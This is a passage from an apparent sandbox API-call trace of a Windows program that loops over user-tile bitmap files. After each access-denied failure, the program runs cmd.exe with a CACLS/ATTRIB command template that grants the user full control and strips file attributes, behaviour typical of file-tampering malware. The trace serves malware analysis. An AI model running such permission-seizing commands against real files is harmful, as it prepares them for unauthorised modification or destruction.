Account Pictures\\Default Pictures\\usertile28.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp", lpFilePart=0x12eab4*="usertile28.bmp") returned 0x52 [0186.468] GetLastError () returned 0x5 [0186.468] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0186.468] LocalFree (hMem=0x1c6cc8) returned 0x0 [0186.468] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0186.468] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0186.468] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.468] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.468] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0186.468] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0186.468] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0186.468] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.468] ReleaseMutex (hMutex=0xf8) returned 1 
[0186.468] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.468] ReleaseMutex (hMutex=0xf8) returned 1 [0186.468] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.468] ReleaseMutex (hMutex=0xf8) returned 1 [0186.468] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.468] ReleaseMutex (hMutex=0xf8) returned 1 [0186.468] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.469] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp", lpFilePart=0x12eab4*="usertile29.bmp") returned 0x52 [0186.469] GetLastError () returned 0x5 [0186.469] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0186.469] LocalFree (hMem=0x1c6cc8) returned 0x0 [0186.469] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0186.469] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0186.469] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.469] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.469] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0186.469] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0186.469] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x128, dwThreadId=0xef4)) returned 1 [0186.471] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0186.771] CloseHandle 
(hObject=0x1b4) returned 1 [0186.771] CloseHandle (hObject=0x120) returned 1 [0186.771] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.772] ReleaseMutex (hMutex=0xf8) returned 1 [0186.772] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.772] ReleaseMutex (hMutex=0xf8) returned 1 [0186.772] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.772] ReleaseMutex (hMutex=0xf8) returned 1 [0186.772] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.772] ReleaseMutex (hMutex=0xf8) returned 1 [0186.772] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.772] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp", lpFilePart=0x12eab4*="usertile29.bmp") returned 0x52 [0186.772] GetLastError () returned 0x5 [0186.772] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0186.772] LocalFree (hMem=0x1c6cc8) returned 0x0 [0186.772] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0186.772] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0186.772] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.772] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.773] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0186.773] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0186.773] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0186.773] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.773] ReleaseMutex (hMutex=0xf8) returned 1 [0186.773] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.773] ReleaseMutex (hMutex=0xf8) returned 1 [0186.773] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.773] ReleaseMutex (hMutex=0xf8) returned 1 [0186.773] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.773] ReleaseMutex (hMutex=0xf8) returned 1 [0186.773] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0186.773] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp", lpFilePart=0x12eab4*="usertile30.bmp") returned 0x52 [0186.773] GetLastError () returned 0x5 [0186.773] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0186.773] LocalFree (hMem=0x1c6cc8) returned 0x0 [0186.773] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0186.773] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0186.773] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.773] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.774] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0186.774] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0186.774] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xfac, dwThreadId=0xd68)) returned 1 [0186.775] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0186.993] CloseHandle (hObject=0x1b4) returned 1 [0186.993] CloseHandle (hObject=0x120) returned 1 [0186.993] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.993] ReleaseMutex (hMutex=0xf8) returned 1 [0186.993] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.993] ReleaseMutex (hMutex=0xf8) returned 1 [0186.993] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.993] ReleaseMutex (hMutex=0xf8) returned 1 [0186.993] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.993] ReleaseMutex (hMutex=0xf8) returned 1 [0186.993] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.993] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile30.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp", lpFilePart=0x12eab4*="usertile30.bmp") returned 0x52 [0186.994] GetLastError () returned 0x5 [0186.994] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0186.994] LocalFree (hMem=0x1c6cc8) returned 0x0 [0186.994] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0186.994] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0186.994] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.994] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.994] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0186.994] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0186.994] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0186.994] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.994] ReleaseMutex (hMutex=0xf8) returned 1 
[0186.994] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.994] ReleaseMutex (hMutex=0xf8) returned 1 [0186.995] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.995] ReleaseMutex (hMutex=0xf8) returned 1 [0186.995] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.995] ReleaseMutex (hMutex=0xf8) returned 1 [0186.995] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.996] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp", lpFilePart=0x12eab4*="usertile31.bmp") returned 0x52 [0186.996] GetLastError () returned 0x5 [0186.996] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0186.996] LocalFree (hMem=0x1c6cc8) returned 0x0 [0186.996] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0186.996] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0186.996] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.997] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.997] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0186.997] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0186.997] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xefc, dwThreadId=0xfa4)) returned 1 [0186.999] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0187.363] CloseHandle 
(hObject=0x1b4) returned 1 [0187.363] CloseHandle (hObject=0x120) returned 1 [0187.363] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.363] ReleaseMutex (hMutex=0xf8) returned 1 [0187.363] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.363] ReleaseMutex (hMutex=0xf8) returned 1 [0187.364] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.364] ReleaseMutex (hMutex=0xf8) returned 1 [0187.364] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.364] ReleaseMutex (hMutex=0xf8) returned 1 [0187.364] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.364] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp", lpFilePart=0x12eab4*="usertile31.bmp") returned 0x52 [0187.364] GetLastError () returned 0x5 [0187.364] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0187.364] LocalFree (hMem=0x1c6cc8) returned 0x0 [0187.364] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0187.364] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0187.364] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.364] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.364] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0187.364] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0187.364] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0187.364] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.364] ReleaseMutex (hMutex=0xf8) returned 1 [0187.364] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.364] ReleaseMutex (hMutex=0xf8) returned 1 [0187.364] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.365] ReleaseMutex (hMutex=0xf8) returned 1 [0187.365] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0187.365] ReleaseMutex (hMutex=0xf8) returned 1 [0187.365] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0187.365] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp", lpFilePart=0x12eab4*="usertile32.bmp") returned 0x52 [0187.365] GetLastError () returned 0x5 [0187.365] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0187.365] LocalFree (hMem=0x1c6cc8) returned 0x0 [0187.365] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0187.365] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0187.365] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.365] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0187.365] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0187.365] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0187.365] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
